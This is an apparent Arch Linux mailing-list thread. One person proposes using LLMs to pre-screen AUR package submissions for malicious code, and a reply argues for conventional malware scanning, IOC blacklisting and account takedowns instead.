Re: [Idea] AUR vetting process using LLM models

aur Fri, 29 May 2026 01:54:53 -0700

Hi,

I'm opposed to this idea not because it's AI, but because it's misapplied and likely to be really costly with a non-deterministic result.

What you are proposing involves the AUR to start checking every single commit via a DevSecOps CI/CD SSDLC style pipeline, but only including one tool (homebrewed AI solution).

It would be better to set up proper security tooling, or even integrate 3rd party malware detection services.

Reinventing SAST and DAST scanners here via selfhosted or costly 3rd party LLM providers seems like a very wrong approach.

A solution here should focus on clustering and detection of compromised/malicious accounts for rapid takedowns or a moderation hold, prevention of malware being included by blacklisting known IOCs in packages, lastly proper automated scanning of existing packages for malicious activity.

AI and LLMs have a role in supporting those three tasks as portions of the tools, not as the solution itself.

You are welcome to scan the AUR currently and make "bot comments" on the maliciousness of packages, but I think any Arch hosted or developed solution should stay away from spinning up such expensive infrastructure to reinvent the wheel.


Regards,

Shyamin Ayesh:

Hello Everyone,

I know this is going to be a controversial idea, and I'm not much of a
writer, so bear with me here.

I've been noticing the recent wave of spam packages and malicious code
submissions hitting the AUR lately. It's getting worse, and the current
manual review process clearly doesn't scale.

So here's my possibly unpopular suggestion: *what if we used LLMs as a
first-pass filter for AUR submissions?*

*The basic idea:*
   - When a PKGBUILD or install script gets submitted, an LLM scans it for
sketchy stuff like obfuscated code, curl pipes to random endpoints, crypto
miners, encoded payloads, that kind of thing.
   - It doesn't replace human review. It just flags the suspicious ones so
reviewers know where to look first.
   - Unlike regex-based scanners, LLMs can actually understand code intent.
They can catch things like subtle dependency hijacking or weird
post-install behavior that static tools would miss.
   - Flagged packages go into a queue with the LLM's reasoning attached, not
just "blocked" but why it thinks something is off.

I get it, there are real concerns. False positives, inference costs, and
honestly just the idea of putting AI anywhere near the trust pipeline. But
I'm not saying replace anything. Just add a layer. Could be a server-side
hook on submission, or a community bot that comments on new packages. I'm
happy to help build a prototype if anyone's interested.

I know some of you are going to hate this idea, and that's fine. But the
spam problem is real and getting worse, so I figured it's worth putting out
there. Open to better ideas too.

Cheers*,*
Shyamin

OpenPGP_0x45E5F8C1504CDA42.asc
Description: OpenPGP public key

OpenPGP_signature.asc
Description: OpenPGP digital signature

Re: [Idea] AUR vetting process using LLM models

Reply via email to